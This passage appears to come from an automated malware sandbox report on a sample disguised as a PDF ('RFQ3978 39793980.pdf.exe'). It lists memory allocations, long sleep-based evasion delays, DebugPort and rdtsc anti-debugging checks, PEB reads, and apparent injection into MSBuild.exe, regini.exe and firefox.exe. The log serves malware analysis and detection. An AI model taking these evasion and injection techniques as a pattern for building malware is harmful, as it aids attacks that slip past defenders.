                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 7550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 8700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 9700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: A1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: B1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: C1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E rdtsc 5_2_0115096E
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\regini.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe TID: 1368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 1740Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 1740Thread sleep time: -68000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe TID: 6192Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004BC530 FindFirstFileW,FindNextFileW,FindClose,7_2_004BC530
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: firefox.exe, 0000000A.00000002.2651352848.000001E20D98C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^N
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561014505.000000000142F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0115096E rdtsc 5_2_0115096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00417833 LdrLoadDll,5_2_00417833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BA118 mov ecx, dword ptr fs:[00000030h]5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BA118 mov eax, dword ptr fs:[00000030h]5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BA118 mov eax, dword ptr fs:[00000030h]5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BA118 mov eax, dword ptr fs:[00000030h]5_2_011BA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D0115 mov eax, dword ptr fs:[00000030h]5_2_011D0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov eax, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE10E mov ecx, dword ptr fs:[00000030h]5_2_011BE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01140124 mov eax, dword ptr fs:[00000030h]5_2_01140124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A8158 mov eax, dword ptr fs:[00000030h]5_2_011A8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116154 mov eax, dword ptr fs:[00000030h]5_2_01116154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116154 mov eax, dword ptr fs:[00000030h]5_2_01116154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C156 mov eax, dword ptr fs:[00000030h]5_2_0110C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov ecx, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A4144 mov eax, dword ptr fs:[00000030h]5_2_011A4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4164 mov eax, dword ptr fs:[00000030h]5_2_011E4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4164 mov eax, dword ptr fs:[00000030h]5_2_011E4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119019F mov eax, dword ptr fs:[00000030h]5_2_0119019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A197 mov eax, dword ptr fs:[00000030h]5_2_0110A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A197 mov eax, dword ptr fs:[00000030h]5_2_0110A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A197 mov eax, dword ptr fs:[00000030h]5_2_0110A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01150185 mov eax, dword ptr fs:[00000030h]5_2_01150185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CC188 mov eax, dword ptr fs:[00000030h]5_2_011CC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CC188 mov eax, dword ptr fs:[00000030h]5_2_011CC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4180 mov eax, dword ptr fs:[00000030h]5_2_011B4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B4180 mov eax, dword ptr fs:[00000030h]5_2_011B4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E1D0 mov eax, dword ptr fs:[00000030h]5_2_0118E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D61C3 mov eax, dword ptr fs:[00000030h]5_2_011D61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D61C3 mov eax, dword ptr fs:[00000030h]5_2_011D61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011401F8 mov eax, dword ptr fs:[00000030h]5_2_011401F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E61E5 mov eax, dword ptr fs:[00000030h]5_2_011E61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E016 mov eax, dword ptr fs:[00000030h]5_2_0112E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01194000 mov ecx, dword ptr fs:[00000030h]5_2_01194000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B2000 mov eax, dword ptr fs:[00000030h]5_2_011B2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6030 mov eax, dword ptr fs:[00000030h]5_2_011A6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A020 mov eax, dword ptr fs:[00000030h]5_2_0110A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C020 mov eax, dword ptr fs:[00000030h]5_2_0110C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112050 mov eax, dword ptr fs:[00000030h]5_2_01112050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196050 mov eax, dword ptr fs:[00000030h]5_2_01196050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113C073 mov eax, dword ptr fs:[00000030h]5_2_0113C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111208A mov eax, dword ptr fs:[00000030h]5_2_0111208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D60B8 mov eax, dword ptr fs:[00000030h]5_2_011D60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D60B8 mov ecx, dword ptr fs:[00000030h]5_2_011D60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011080A0 mov eax, dword ptr fs:[00000030h]5_2_011080A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A80A8 mov eax, dword ptr fs:[00000030h]5_2_011A80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011920DE mov eax, dword ptr fs:[00000030h]5_2_011920DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C0F0 mov eax, dword ptr fs:[00000030h]5_2_0110C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011520F0 mov ecx, dword ptr fs:[00000030h]5_2_011520F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0110A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011180E9 mov eax, dword ptr fs:[00000030h]5_2_011180E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011960E0 mov eax, dword ptr fs:[00000030h]5_2_011960E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C310 mov ecx, dword ptr fs:[00000030h]5_2_0110C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01130310 mov ecx, dword ptr fs:[00000030h]5_2_01130310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A30B mov eax, dword ptr fs:[00000030h]5_2_0114A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A30B mov eax, dword ptr fs:[00000030h]5_2_0114A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A30B mov eax, dword ptr fs:[00000030h]5_2_0114A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov eax, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov ecx, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov eax, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E8324 mov eax, dword ptr fs:[00000030h]5_2_011E8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov ecx, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119035C mov eax, dword ptr fs:[00000030h]5_2_0119035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B8350 mov ecx, dword ptr fs:[00000030h]5_2_011B8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011DA352 mov eax, dword ptr fs:[00000030h]5_2_011DA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01192349 mov eax, dword ptr fs:[00000030h]5_2_01192349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E634F mov eax, dword ptr fs:[00000030h]5_2_011E634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B437C mov eax, dword ptr fs:[00000030h]5_2_011B437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108397 mov eax, dword ptr fs:[00000030h]5_2_01108397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108397 mov eax, dword ptr fs:[00000030h]5_2_01108397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01108397 mov eax, dword ptr fs:[00000030h]5_2_01108397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E388 mov eax, dword ptr fs:[00000030h]5_2_0110E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E388 mov eax, dword ptr fs:[00000030h]5_2_0110E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E388 mov eax, dword ptr fs:[00000030h]5_2_0110E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113438F mov eax, dword ptr fs:[00000030h]5_2_0113438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113438F mov eax, dword ptr fs:[00000030h]5_2_0113438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov eax, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov eax, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov ecx, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov eax, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B43D4 mov eax, dword ptr fs:[00000030h]5_2_011B43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B43D4 mov eax, dword ptr fs:[00000030h]5_2_011B43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CC3CD mov eax, dword ptr fs:[00000030h]5_2_011CC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011963C0 mov eax, dword ptr fs:[00000030h]5_2_011963C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F0 mov eax, dword ptr fs:[00000030h]5_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F0 mov eax, dword ptr fs:[00000030h]5_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F0 mov eax, dword ptr fs:[00000030h]5_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011463FF mov eax, dword ptr fs:[00000030h]5_2_011463FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110823B mov eax, dword ptr fs:[00000030h]5_2_0110823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A250 mov eax, dword ptr fs:[00000030h]5_2_0110A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E625D mov eax, dword ptr fs:[00000030h]5_2_011E625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116259 mov eax, dword ptr fs:[00000030h]5_2_01116259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA250 mov eax, dword ptr fs:[00000030h]5_2_011CA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA250 mov eax, dword ptr fs:[00000030h]5_2_011CA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01198243 mov eax, dword ptr fs:[00000030h]5_2_01198243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01198243 mov ecx, dword ptr fs:[00000030h]5_2_01198243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
